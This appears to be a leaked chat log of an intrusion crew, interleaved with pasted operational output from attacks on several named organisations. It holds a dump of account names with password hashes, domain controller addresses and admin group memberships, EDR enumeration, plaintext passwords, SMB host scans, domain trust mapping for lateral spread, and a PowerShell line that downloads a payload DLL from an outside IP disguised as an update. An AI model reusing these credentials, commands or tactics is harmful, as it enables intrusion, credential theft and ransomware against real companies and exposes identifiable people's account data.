TB-000013$ 34ee0886ff22949285aa9a577c65cc91 4098 34848 USCHI-DT006$ c6a385344fae237c9c4a4f5e917cdb1d 4098 22758 DT-000031$ 526d9e8401ce413dbf35cbf3c70b0da4 4098 21780 DT-000032$ 2296e9237b468ff1400c782aa6df6468 4098 20730 DT-000029$ f3d95da1159543bec50d5b1400d2474f 4098 15271 DT-000007$ b0d10640c534fae0afe198847a851008 4098 21954 DT-000018$ 2a8d5977e4ec67435db8baa089341773 4098 19664 DT-000020$ ce0f7bcbff9c37abd66c937961cc3c14 4098 19549 DT-000021$ d173ccd63ad96aab6e5b9b92dfc662aa 4098 40579 DT-000023$ 2f97ff262e8d06df57cfe4a298669a51 4098 19683 DT-000027$ c5e1e9e1d9ae8a76f2961d1f3b2ff310 4098 34747 DT-000035$ 8095b6ca7cc3e9d7d6b992dc45c67b47 4098 21846 Sandy.Homola 2a62d5efcbeb54286491b55423e3a347 512 20742 SVC-VMPRO2 38325de5e92def2f2dcca30ee4bd662e 66048 40034 Shelby.Short f63129f0a859daf2311bc82064701544 512 40057 HRER 7cae723808d12238a6d0aa770aa52edc 66048 12562 FS-0043$ 6d4e5a0c50bc6c15e902210a4ee3d245 4096 12567 FS-0043 0edd65b3dd036ad79635bcfaca838d45 66048 15273 FS-0056$ c2afe9df78f1c22079cfbeb2dd23c2ae 4096 34833 Timesheets 3e68df19477c841b7a8f27e240b56c01 512 34881 HR ba95aab539357bd1fe94759c6a9804e8 512 20280 PCHIAPG010$ 9cbc146b86dedd37a6d3448b10d119e7 4096 
33873 PCHIAPG017$ 7df7c7fd15e3577958c7d40ef9faa351 4096 40241 LT-000062$ 7b1400afe0422cd09214379bb43bf5b7 4096 39977 Martin.Nysten c9ffb510567a4fb9c53d582b19d1b775 66048 39976 Henri.Kaakinen 40b0365d0aafc03f0a2f18889992533c 66048 39974 Anne.Holmedahl fe7860b8f03341f1e8c31109febd9a65 512 39975 Tomas.Dahlstrom acac0693730e97b33d632ddfbcd402 512 36657 Jon.Balis 4932ad17240c95071bf89671861d4b3d 512 40723 Hal.Ogle 9217a7a344287c75baeced4c323fc657 514 40240 LT-000065$ 0d0be3f93585984dbddf865801591504 4096 39834 TB-000020$ 942b2001fe351767803d483ee50a40a4 4096 44744 38thJS-Chicago 7cae723808d12238a6d0aa770aa52edc 66050 44843 $DUPLICATE-af2b f7c1456efea13f09528df39630981eab 66048 33915 LT-000043$ 0c4e526e1a67941e2c6fdcbd0f8e913e 4096 39972 DT-000034$ a3378c962533a77845fcde78ede9b917 4098 34843 DT-000026$ cf92a94eb87ca142c3bba401299e2caf 4098 21805 DT-000019$ c0bf3fba46614a0872b46cbecaccd018 4098 34189 Hilary.Kramer b2930fcc52bdf8c3c5912fd972fb83cf 512 39827 AntwiP d74a3b0bf69e24da7b2d9198fd4ad3f2 514 40374 AdcockL fe327068714bfe601b48a107846021f7 514 40507 AllisonA 5b4797463c83662f4d0de1361b5e487b 514 34175 BankstonG 8a28fc18e98844278a7c38675c8bbdcf 514 34176 BlaizeR f3bb0a64824454cf3e284f4597cc1712 514 34109 BloyA 7f2802556b4b7e55ffb06c038ee9f8fa 514 34177 BoswellE 3db0d8dc19b5dd15f5b020d07bbead2d 514 34178 BoyceS 5b4797463c83662f4d0de1361b5e487b 514 34106 BrodieR b61275d2ec88934b37f5afdd4ef078f7 514 40732 CardosoD b2a7e3900b8dba04582ef2a39bdcc445 514 34103 CanfieldT 627ba3cd4c5f2fd57a6a324d115d5b4a 514 34179 CarlisleM 5b4797463c83662f4d0de1361b5e487b 514 39673 CarringtonE 8d4add6965b2bd0b3fae399d0609c5be 514 33973 CarrollB 26b23421373fe0324fac8f94a87cefeb 514 34003 ClarkL a198c19e77e1a508998e3abc2a0f9e78 514 40412 ClarkeP 90c7f2ff15c2932287a42f3049051fd6 514 39664 ClemensA 5b4797463c83662f4d0de1361b5e487b 514 39459 CoburnS 08acfd3bd91566d95b6c8270edbd89ce 514 34180 ColeG 5b4797463c83662f4d0de1361b5e487b 514 37773 CurtisJ 6e2a080b0fc6d7e087576b33f8594e6b 514 37771 
USCHI-SBS001$ f566c38ec892e0a28d68a3b77e74dbc5 4096 22147 Joyce.Hess 9744fc04d59464a9101c3dac1917934e 512 40054 Karla.Vazquez 9d3e84fbf49431a251a1515d3f4f1f8e 512 44865 NunezD d4fba61be46a8ebb3aeeedee0a4038bf 512 40576 USCHI-CAS001$ 69c140d5d8a9ad4e3d6d7fe099e7f9ef 4096 40342 Pat.Green 2ebe1d394c3c5711ea76236b0173b778 512 36223 Vesna.Radisic fb5e3c00e06bfb6847bae11d7e6e1994 512 42290 AndersonC ebef1aaff78ac76c35e44bfce75982bd 512 40123 TB-000036$ 312b5c52e8954f12eff556e402cbafda 4096 37384 MenziesR 3367dadb1ed47da301d1bc4331ad7f0d 512 40138 HealthMailbox7dffa84 0e44804bc042abbd733cae446c155a4c 66048 40603 USCHI-PWW001$ 6c3e9d3db5269a69f5aff34f18d0aae9 4096 37203 MiuraK 21ac27c0868ccf48114b987b5da003a9 512 44882 KabagambeJ e3e7b0543be88244044aa0419627fced 512 40648 PulikkaparambilB 427515f386d3e50451a4176383f8d455 512 44885 SteedR 363c87306faacef08d7faa569532f7e6 512 40376 HealthMailboxe791b9d 0c434c5afffa78d4a9a0be9f25038417 66048 40366 HealthMailbox85c3001 eb240d279f937b933ebdf29099401261 66048 40058 KloackT 1ed48e1bc5774560fb655885c5ed6ea8 512 4197 SLADMIN bfe403f6a8d8c12ab1eef72e8a6585be 66048 40736 RichP 2d9d033dcc5dfb33cc9cb7e8294bccf4 512 21904 sh-0004$ 84c576b6197d597efded2247bf54879f 83955712 40651 ValdezB 7bd8b75261ae347d554d6a66cf500b27 512 33886 SP2013serviceapps 16767f231fb7aa2531053a5b53573e98 66048 33813 PCHIAPG014$ b82a6e38d98eb8a0ed50e33e548934f0 4096 33828 SAVDBAdm 5fd68e13747bddbbfdf54ac1869d70e9 66048 41230 USCHA-PWW001$ 860b0d360b082b341800e82fb7f74ed3 4096 39292 USCHI-BKP001$ b3a54016b633555cb2c45bd260e2cb4f 4096 41730 USCHI-DCG002$ 89be79d014709894e3a4ecfb13364787 4096 40002 USCHI-DCG001$ 7f9e33242c3bdacf3167e1e5037da588 532480 39924 USCHI-SPS001$ 4b213eda5ecfad068bc257013fb5e20f 4096 40364 HealthMailbox46fdce2 6163918f7434b212ceb6c092243e862a 66048 13839 LACROSBR 2b576acbe6bcfda7294d6bd18041b8fe 512 44866 USCHI-MSE004$ 419f9d0b43ddf54afc055bea19761b46 4096 43229 SophosSAUUSCHI-DCaab 6177d025c2ae61fcb8c8cee4b77a30a8 66048 41215 USCHI-MSE003$ 
050ace4d718c94d3ae26efcfe83a6fc6 4096 44880 FerminE 97053671b85e4329d934da1c808a601d 512 37845 USCHI-DCP001$ ec0dd0e7ccc1b987321d578bfcf7ecaa 532480 13495 TAGGESE 96a2ae3ca2484d6c962751f8773a5fdd 512 34077 HealthMailbox3bc09a0 bdf99b080aedbf7d6668d1e818b1a07b 66048 21796 PCHIDCG004$ 0674f6b7d36bae96c95483ab08b81fb6 532480 39642 HealthMailboxca7c70d 419cf8b0a574b08b2c8f69eb4c214255 66048 40134 SVC-Veeam dde65a21db3af8f11019185a813a081f 66048 39833 USCHI-PSC001$ f3ecc65e9b71f5e24c9979eb29285a53 4096 38641 LT-000048$ 7d2387aeb1136ca43cd75de4b92a1636 4096 20740 USCHI-DT005$ bcacaaf0b5f3a0b54d1a972d92fc8e3b 4096 40666 SVC-NWA001 7aa985a0598066c03db3abe4094f6d10 66048 44881 BibbsS c5cff0d8f6a568d70bc9a5148977672d 512 34107 PhillipsM 8142ab27b7f2a038a7aeebf9ee617a15 512 41864 HinckleyA 68ca58d996aba1f5878a972c610a3d 512 39641 HealthMailbox1e77af7 7915f3f20388ab15624b0f4b1b2abb 66048 44859 EvansM 2f2a0f15cddcb538a13481d04e2137d0 512 44782 PrietoE 20f841336733db221932aca9bb92bc72 512 1983 SAMISJA fba2962905225eee1984a160cdcd0bd6 512 39836 TB-000019$ 7359d7b0cf57fec0a98efc6346fd8b63 4096 39638 HealthMailbox1aff693 bb4bd23653d2025bcb529892e647188b 66048 13266 MITORATJ 877d04d5fcd2277388e50745c79d66e9 512 44764 KeaneM 10596d2a5b807b566d13bfba12e4bda8 512 40358 USCHI-MSE001$ 684abc6d405470366aed0a5efd16ee32 4096 41003 MeyyappanS 2d1c67f526d438a03e14b4de962846eb 512 39289 McNabbL 92c2c9b5bdd41b535414498a9a967683 512 37571 RogersonA 1169d1f3053125533b3e3bb07fa885cb 512 22729 DT-000025$ 727aa92479668cf26a03d878fe81c4b1 4096 41747 KoduriS c283a8cc8f5d9727750a83bdffd525f3 512 41856 Søren.Nielsen 50f4eada5e0effbb0a6a6077548beb11 512 34073 HealthMailbox4d92850 24cd092214357c799bacaa08457ee1a3 66048 40653 SPS-DB-2019 02a31562bc3b3aac1cc3608c28c62350 66048 44901 MylesJ 3febbce1eb70eee2e24430f2be789e5a 512 40525 LT-000078$ beb480edaa18ca91debe43e5be2838d2 4096 13744 SQL0005$ 2d8063e015b796480bc8bdfe35a201a3 4096 44828 CapraM 47bbd4f50abed656114d7ae74a4fedc9 512 40371 HealthMailboxed9d8d9 
9429736b4a0b62d8728312c2830fce43 66048 44907 GregoryR 772be1beef56ed673ef0f01c5fe79258 512 37390 DanielsK b716f104b4773a1539d2fd4d15359564 512 34034 USCHA-VHH001$ c7d58e07ec5f97291189c48e1a28516e 4096 39831 LT-000079$ b3eaa1b642d5363f8e24f7370dbe99dc 4096 38517 AltrecheJ 829ad4cb3fa507ddf6c43399444987ba 514 40471 RileyD be8f810d3a4602298f5713d9e7e07c1c 512 40112 SophosSAUPCHIDCG0aaa 770c6f7256a41290fb59124cbde25309 66048 39701 USCHI-LT003$ 96f1875dfa96ac2f4390489a8946f5ac 4096 34813 SCOMreporting 2b4ed2bfde9efc81a41a85d1d5206fd4 66048 20759 PCHIAPG011$ 185ae7cf060d09f8292e92d07f8d3b2e 4096 41939 Jessica.Dineen 64bfd4fa6d778d096cf5eae8e9282f82 512 40377 HealthMailbox2b23d1e c02fa50ec46d90b2885626b738f6d2f1 66048 41774 SophosSAUUSCHI-DCaaa 41e9b05f5eba91dd26c16f8922fd7107 66048 20073 SAVDeploy 6ac770270567476621b6e4226e1b1619 66048 41833 FukamiY 092a4ec16a506dab687cd27e7335ce7a 512 41772 BicheteroE a68984c3cc52681084fde11def4e6966 512 40655 SPS19-Admin 7cae723808d12238a6d0aa770aa52edc 66048 44883 KokkulaS 70e2518735a9b9df1c6fe0e22cbba18a 512 39856 LovayM 8f21392eb6fb500710b40af8a83f5fdf 512 40375 HealthMailbox75828a5 14fb0f6968ae8000f7fddf4c4a1f5fbd 66048 33880 USCHI-APG003$ 91b3b29dc656eb02af1ee8724ae8516f 4096 40526 NgoB de77fb80297f0d8ee2bcb99c3d0961aa 512 40979 JahromiN 09bb23fdfd6a8a5088d4b00b158519 512 38320 ZiolkowskiE 01fa0546c5e947936d58858b8dd6bf07 512 39968 SalgadoM 2284fd51c15b03df26481f4aa7726343 512 1832 DILBERT e1512765af2d617b540f2999cd7afa2a 66048 41738 BhongleH dbd07c1ef0981122c1cd9788426544a8 512 33884 SP2013farm 2f519bb54ffe29f9357fb0cc254fe38e 66048 19573 PCHIDCG002$ 8d94d2d5e9a1fc805d674f10d3b53373 83890176 41938 HawthorneD d47c32e32ae363e9020a81251e4c7921 512 34828 USCHI-APG004$ 031d29fbfd0f65939f073f28d6183a11 4096 22114 AdamsK 6296d23a25e9c800cd9431bdd2cd0c8b 512 39650 HealthMailbox7fb5d79 e6e982558e944abe9f51bf87ca85cdef 66048 20257 PCHIWSG007$ 49f5bae02ea59d68412d6115a9f9b495 4096 44792 NickelM 35f4889cc82f619ad4638a9988c233fa 512 21809 
WilkeC 045c26734b9a005cf17f6a48dd1bdd4f 512 41139 Simon.Inocencio 39ab73ea993df91d65361760b15acb3c 512 41090 MackenzieK ee96c882ab32624a08188d7111f92267 512 41226 USCHA-PRT001$ c16ab8e9a41be31efae55df824f73708 4096 44727 Bodjolle-KapsaE ef1b5daf2f4b1bf73413d5e3c51ab869 512 20086 PCHIDBG002$ b081869968ff5d060a79f579f713a3e8 4096 37381 MathisJ 0e817d0a116910563855e2da902b82b2 512 41231 USCHA-DT-CR001$ eff53ed4c77bd7ffb38c74357497c749 4096 37159 Ray.Buhay 6e323a577da3920fb3c2887bc7c8f168 512 20758 PCHIDCG003$ 14f854007faf8024d323f76e2f0b49e4 532480 40378 HealthMailboxf2d3ff4 c972570018e0cb375823ab568f579740 66048 37376 USCHI-EX-LT002$ d8a6a8673e6a15981904a1ce1de7e8e0 4096 40660 DecheR 77322482be2e94d9874fd64d82152791 512 39941 BreenK 1665591f8df783b9475da7f2884994 512 21893 Young.Park a659b5d96eebff7c685cb86eba16ce13 512 40691 SVC-PWORCHFWK c1170d8f273a1f960198107aea89c24d 66048 33889 SP2013superuser dc943a63d9e224c4c1eecb60b0ea7121 66048 41807 CarinoB 11a0dfce42b63f0ba9df53a0f5026fef 512 40061 JPTKO-AR-LT310$ 0310b3c240b6127b3df221ef82438ce7 4096 40124 TB-000037$ bb360076d0af24e55c21a77912b308ee 4128 41014 McPhersonE 31d65df69b4ab96c5ff55f708b912779 512 39818 MadeleyS 307bb063c7dcb33e53b5d8ba529d7a4f 512 39873 USCHA-AD-TB261$ 5ab8e2b6e666d743727d98d75023a256 4096 42401 SotoC 32cb854c0132b64c69a89d729641f153 512 42258 TurnerM 212c2d842a78d9a10c33e85b5ad0e11a 512 42272 WagonerJ fc2970fc5a43549fe9ec50d026a86db1 512 39584 Christy.Henrichs 59477c4c32a6c8d613bea847f9a64015 512 37722 WheelerE 336c8fe2fc69a9c4683a7a91f3a32011 512 44862 4thMain.Chantilly 3ab8d132f8151f6e5e32d3ba00ceb903 66050 40734 MouzannarC 46749b07379289de468f568085d6c725 512 41007 OkukuP c0d0fff534b2ccf66f0570a3a0c5a3af 512 37774 RobertsL a39da193c6b7e3f860e941a50215ae76 512 44884 LT-000114$ 0940be018d064238de3ea4a03a069568 4096 40797 USCHI-PWA001$ a2408e0599790f88aa63ab3eab229116 4096 34920 LT-000061$ b7af82224efada47366a3790fd50904c 4096 39965 CookD 2a43d97f788955bac9d882dc0fb3dbfa 512 40733 
USCHI-MAXD001$ cdc6a1af54ee65e0333204d3fbb1a198 4096 22783 RIEHLEBN 5b7b730c9fd6deecdcd148a9bff5133a 512 37723 KondoE 3bc541064d8ec3ed649691968690a264 512 42423 Hector.Lassalle 431974f5bf9c35f3a10a29109e19724c 512 34167 DeScipioB f95502d80b9ea878f0018c7b0c6f87c8 512 33966 DadzieH 6d9290e770d5bf1ff6836840b7b59f84 512 40323 RutledgeJ 5e56216cb25e0e8e2a542ca39360751f 512 40078 KennedyM b2ed696d60faf2d7ab36ad803380bc5c 512 44793 OtisC a7057b710c850a2583d91e6ab6515762 512 39920 USCHI-PWD001$ 36a1eaedea094edab12b84cfa98b0c50 4096 40077 USCHI-AR-LT304$ 3c8fab905433bdba5ba414918817bda1 4096 40703 OShaughnessyJ fc3f57382132cc724d0c1a247deedd21 512 34923 USCHI-PRT001$ 8fb45d6305cedd6aceca53ede74483d8 4096 33901 USCHI-NET001$ 3e3f3c8ed0f7f043dda23abb1c28cc21 4096 41735 SVC-ADFS$ d6e4acd9308e2f5a6292157d86da9c92 4096 39950 USCHI-EC-LT471$ ee0936fb5f7a8e0ef8eba480c7f54cd6 4096 41937 McBrideM cc9d0dbf4258fdc1e55ff26ad2ee2932 512 40600 McGuireJ 1d11ae313783e45c5394d08781604544 512 41018 YadavV 7491dd8b724426c29f27f366fb6ecca6 512 42291 HenryE a440a912fc6ecb526b5760775fba853e 512 39830 MitchellP 88936881f2f85b62e0083c12ee565172 512 34118 LT-000072$ 636bbb93ced29a73ddaee259a5ba06c8 4096 22075 PCHIAPG016$ 18202163319af72e40cf316542584fe0 4096 44900 RichardsonT a544ba6f928c87cb61e97c380d9e241f 512 16992 SQL-RPTSPS01 383b1ddb10bb01e5ffb7b163dc095418 66048 36401 RayC 4f6b6dce47b14e9d1898763c96ce962d 512 40031 DovinosE 2d05292f9228f8bd91837fc787c79f5c 512 34850 38thNorth.Chicago 3571ba6026a4d905f3e866c94f7a4eb5 66048 44766 LT-000094$ 6ff7a1a8950aedd6cb9ccf13ef1859a3 4128 40578 LT-000082$ 8eef661c8cdf5e4b46384cc2014583ff 4096 44795 USCHA-AR-LT302$ c0e8c00b7a1ee4bde23d1e189bef3567 4096 37404 SmithR c7d64ed4e0fbd04c58f4644c80dd8c02 514 39479 PahutskiN 38512ad3100ab037926f0f0a5b70f389 512 40120 SammarcoS c92a5c63cae2e7428495d8b77fc97e92 512 42255 KroenungJ 9c290f9f7183278c8827c34a218ee0dd 512 44745 WuJ aeded1ca393ba33656f9efb397c7d731 512 39871 ParedesC 24d5dbf209b2dcf8f60546c3231765b7 512 
34035 USCHI-TB001$ f594e97a770996e3ec9514dca67363db 4096 34015 BratekC 96d4f40946ad8b0b928598e73031035a 512 42274 LT-000116$ 1f070a8d2f1056c2b177f97980fae907 4096 41741 SebastianD 45eed92671229eefc97251761581d3b9 512 39949 LT-000089$ d04aadc6108129c812050798f974c4a1 4096 44864 LT-000106$ 5680be9406feb8775eb1c65b1f42c41e 4096 40243 LT-000068$ 7e44c433fca95f7eead0f2058e1fc0a3 4096 20232 PCHIWSG005$ ee7f254869179c7632bc7e40f8349905 4096 22750 BoyceJ a481368014afcd2a9ac6ccf629dd54e5 512 39837 TB-000018$ 2d5fad9ae1924e8adcccaa774ab12e09 4096 40466 LT-000074$ 776b0637557c0ac21387a73f1c615f82 4096 39998 LT-000085$ 5be140a216e0011c33ffe17314d57e5b 4096 2019 ZINNIPJ 600b76d06fdc806b243152e2d96cee45 512 41729 USCHI-SBS003$ 82f1bad43965f98bd878ce977afde47b 4096 40668 TB-000030$ 7855accb72823ebfcc9cf005b646c1e4 4096 34785 InfoSecJournal 68ffcc0181a44868b8db2d1937e9b259 512 40032 USCHI-DCG003$ d8af49fad0a9d90c7a8de32ad6e4272c 532480 41737 USCHI-AI-LT321$ a672928458f8afdf59864e49a54e10ca 4096 39652 LaiP 4bc27b001dea96386b673c6d59ee25b6 512 41146 USCHA-AD-LT265$ 183664d73040e5be79033c2712c74c17 4096 40581 USCHI-EE-LT424$ 264e736f50b910d9e1ba6de10bfbe827 4096 41147 LT-000108$ 81bbc0c79572ce1a4f04504119316b74 4096 41812 HealthMailboxfe74d85 c7b6dc2062284275f0f821a9723a5ec3 66048 37736 LT-000038$ 328512fed883d24da5ec344057e4422b 4096 40400 USCHI-NWA001$ ff3efe403ab4bde2c8eb59e503c17e54 4096 501 Guest 1ac40696bc0a5b0148da4ceffecc97df 514
```
20 min
I'll tell you a bit later
are we working until 2?
I'll hand out 2 DLLs
we're looking for 2 servers out in the sticks
nice work guys)
Glory to the great warriors)
`HOBBES\RAMIREZJ 389f9e02b67727a4e3741a181a560e1d`
user3
```
Domain Controllers:
Server Name    IP Address
-----------    ----------
PCHIDCG003     10.20.32.100
PCHIDCG004     10.20.32.28
USCHI-DCP001   10.20.32.175
USCHA-DCG002   10.6.0.56
USCHI-DCG003   10.20.32.103
USCHI-DCG001   10.20.32.101
PCHIDCG002     10.111.2.20
```
```
Alias name     Administrators
Comment
Members
-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
```
```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
DILBERT
MS-0001
RAMIREZJ
SPS19-Admin
SPS-DB-2019
SPS-TS-2019
SVC-NWA001
```
```
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
DILBERT
ePOScan
Exchange Service
LaiP
MITORATJ
MS-0001
PCHIAPG009
PCHIAPG014
PCHIDBG001
RAMIREZJ
SAVDeploy
SCCMadmin
SCOMaction
SLADMIN
SPS19-Admin
SPS-DB-2019
SPS-TS-2019
SQL0005
SVC-CAS
SVC-ESRI
SVC-NWA001
SVC-PW-DBG001
SVC-PWORCHFWK
SVC-PW-ORCHFWK
SVC-PWPWD001
SVC-Veeam
TAGGESE
TENGSERV
UREJA
USCHIPWA001
USCHIPWD001
USCHIPWW001
```
duplicate the messages here
take it
even 2
is there a session in the cob?
cob
actually no
go into tpsh
wait
yes
yes
is there anything else there?
sad
went offline
I'll take a look now
the session died
and Webroot too, it seems..
Sentinel is no obstacle for us) tested)
we're working
wellll
Sentinel))
EDR
```
====== AntiVirus ======
Engine: Sentinel Agent
ProductEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelRemediation.exe
ReportingEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelAgent.exe
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine: Webroot SecureAnywhere
ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
```
DC
`THFDC01 10.254.191.10`
LA
```
Admin
Administrator
CDKLocalAdm
TOMHOLZERFORD\Domain Admins
The command completed successfully.
```
EA
```
Administrator
CDKAdmin
CDKPCADMIN
ProfWiz
THFAdmin
```
DA
```
Administrator
CDKAdmin
CDKPCADMIN
ProfWiz
THFAdmin
```
but no system and no LA yet
no, we got onto a couple of VDSes
found DA?
```
(New-Object System.Net.WebClient).DownloadFile('http://104.243.44.69:8080/Um8r3114/x64.dll', 'C:\Windows\Temp\ms_update.dll')
```
J$13Yr18
```
>sAMAccountName: flshc
>description: Generic Login ID for Fletcher Shipping Clerks (2 COMPUTERS). Generic Novell Password=flshc09 (zero,nine)
```
```
[+] 170.7.180.21:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78229W7E64) (domain:WILSONART)
[170.7.12.16:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:73183W7P) (domain:WILSONART)
[170.7.180.26:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78209W7E64) (domain:WILSONART)
[+] 170.7.180.83:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78211W7E64) (domain:WILSONART)
[+] 170.7.54.81:445 - Host is running Windows XP SP3 (language:English) (name:FAMIXXP) (domain:WILSONART)
[+] 170.7.76.113:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS1) (domain:WILSONART)
[+] 170.7.123.169:445 - Host is running Windows XP SP3 (language:English) (name:73324XP) (domain:WILSONART)
[+] 170.7.160.14:445 - Host is running Windows XP SP3 (language:English) (name:71919XP) (domain:WILSONART)
[+] 170.7.76.11:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP1) (domain:WILSONART)
[170.7.12.114:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74023W7P) (domain:WILSONART)
[+] 170.7.54.63:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP2) (domain:WILSONART)
[+] 170.7.76.114:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS2) (domain:WILSONART)
[170.7.8.19:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74858W7P) (domain:WILSONART)
[+] 170.7.120.13:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77857W7P) (domain:WILSONART)
[+] 170.7.54.72:445 - Host is running Windows XP SP3 (language:English) (name:XPTEST1) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[+] 170.7.170.194:445 - Host is running Windows XP SP3 (language:English) (name:73347XP) (domain:WILSONART)
[+] 170.7.120.93:445 - Host is running Windows XP SP3 (language:English) (name:73657XP) (domain:WILSONART)
[+] 170.7.5.252:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS02) (domain:WILSONART)
[+] 170.7.171.225:445 - Host is running Windows XP SP3 (language:English) (name:73682XP) (domain:WILSONART)
[+] 170.7.5.251:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS01) (domain:WILSONART)
[+] 170.7.121.51:445 - Host is running Windows XP SP3 (language:English) (name:73206XP) (domain:WILSONART)
[+] 170.7.160.78:445 - Host is running Windows XP SP3 (language:English) (name:73844XP) (domain:WILSONART)
[+] 170.7.121.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77212W7P) (domain:WILSONART)
[170.7.120.165:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:78066W7P) (domain:WILSONART)
[+] 170.7.12.33:445 - Host is running Windows XP SP3 (language:English) (name:72697XP) (domain:WILSONART)
[+] 170.7.159.17:445 - Host is running Windows XP SP3 (language:English) (name:73935XP) (domain:WILSONART)
[+] 170.7.181.242:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77217W7P) (domain:WILSONART)
[+] 170.7.180.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77374W7P) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[170.7.180.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77850W7P) (domain:WILSONART)
[+] 170.7.122.115:445 - Host is running Windows XP SP3 (language:English) (name:76291XP) (domain:WILSONART)
[+] 170.7.180.82:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78208W7E64) (domain:WILSONART)
[+] 170.7.182.47:445 - Host is running Windows XP SP3 (language:English) (name:73938XP) (domain:WILSONART)
```
.
```
>sAMAccountName: Administrator
>sAMAccountName: kronosadmin
>sAMAccountName: cognosadmin
>sAMAccountName: ediadmin
>sAMAccountName: polyreyadmin
>sAMAccountName: itco365admin
>sAMAccountName: itco365admin2
>sAMAccountName: hfmadmin
>sAMAccountName: dcdevdb2admin
>sAMAccountName: gcdadmin
>sAMAccountName: p8admin
>sAMAccountName: dcadmin
>sAMAccountName: dcqadb2admin
>sAMAccountName: dcproddb2admin
>sAMAccountName: p8prodadmin
>sAMAccountName: dcprodadmin
>sAMAccountName: dsiadmin
>sAMAccountName: dsiadmin1
>sAMAccountName: dsiadmin2
>sAMAccountName: waitadmin
>sAMAccountName: admindsi
```
well then, we only need to break out into the quarantines
somewhere it doesn't even ping
somewhere I pulled it
I queried these ones
cn.Wilsonart.com ralphwilcon.com uk.Wilsonart.com polyrey.com resopal.ger arborite.com eu.Wilsonart.com
as different ones?
you queried them just like that?
well, so they've been pulled
yeah, I see
it's some kind of mess, yes, but these are different domains with the same name
```
trustdmp.txt:31: dn:CN=Wilsonart.com,CN=System,DC=cn,DC=Wilsonart,DC=com
trustdmp.txt:49: dn:CN=Wilsonart.com,CN=System,DC=ralphwilson,DC=com
trustdmp.txt:67: dn:CN=Wilsonart.com,CN=System,DC=uk,DC=Wilsonart,DC=com
trustdmp.txt:85: dn:CN=Wilsonart.com,CN=System,DC=polyrey,DC=com
trustdmp.txt:112: dn:CN=Wilsonart.com,CN=System,DC=resopal,DC=ger
trustdmp.txt:130: dn:CN=Wilsonart.com,CN=System,DC=arborite,DC=com
trustdmp.txt:148: dn:CN=Wilsonart.com,CN=System,DC=eu,DC=Wilsonart,DC=com
Found 7 matches for "CN=Wilsonart.com".
```
pay attention
it doesn't repeat
not yet, unfortunately
didn't they happen to get brute-forced?
by the way, how are things going with them?
+ there's kerb from the current one
pulled ad_info and kerbs from there
7 trusts in total came out
their current domain repeats many times in the trusts
all the trusts are there
the archive is above
and for each group we'll pick a single deployment point
this way we'll "group" the trusts together
which is exactly what needs checking
most likely they're linked to each other with full visibility
pay attention to entries like these
dn:CN=slf.local,CN=System,DC=Wilsonart,DC=com
dn:CN=slf.local,CN=System,DC=uk,DC=Wilsonart,DC=com
28 trusts is just poor network organization and nothing more, no need to be scared
and we'll pick the corresponding points from which the spread will go
gentlemen, pull the membership of all the domains
user4
`hyperion_service`
```
\\78186W7P.Wilsonart.com\ADMIN$ - Remote Admin \\78186W7P.Wilsonart.com\C$ - Default share \\78186W7P.Wilsonart.com\IPC$ - Remote IPC \\ED79161W10P.Wilsonart.com\ADMIN$ - Remote Admin \\ED79161W10P.Wilsonart.com\C$ - Default share \\ED79161W10P.Wilsonart.com\IPC$ - Remote IPC \\79337W10P64.Wilsonart.com\ADMIN$ - Remote Admin \\79337W10P64.Wilsonart.com\C$ - Default share \\79337W10P64.Wilsonart.com\IPC$ - Remote IPC \\78192W7P.Wilsonart.com\ADMIN$ - Remote Admin \\78192W7P.Wilsonart.com\C$ - Default share \\78192W7P.Wilsonart.com\IPC$ - Remote IPC \\78204W7P.Wilsonart.com\ADMIN$ - Remote Admin \\78204W7P.Wilsonart.com\C$ - Default share \\78204W7P.Wilsonart.com\IPC$ - Remote IPC \\79220W10P.Wilsonart.com\ADMIN$ - Remote Admin \\79220W10P.Wilsonart.com\C$ - Default share \\79220W10P.Wilsonart.com\IPC$ - Remote IPC \\73932W7P.Wilsonart.com\ADMIN$ - Remote Admin \\73932W7P.Wilsonart.com\C$ - Default share \\73932W7P.Wilsonart.com\IPC$ - Remote IPC \\76869W7P.Wilsonart.com\ADMIN$ - Remote Admin \\76869W7P.Wilsonart.com\C$ - Default share \\76869W7P.Wilsonart.com\IPC$ - Remote IPC \\DCWAS25.Wilsonart.com\ADMIN$ - Remote Admin \\DCWAS25.Wilsonart.com\C$ - Default share \\DCWAS25.Wilsonart.com\F$ - Default
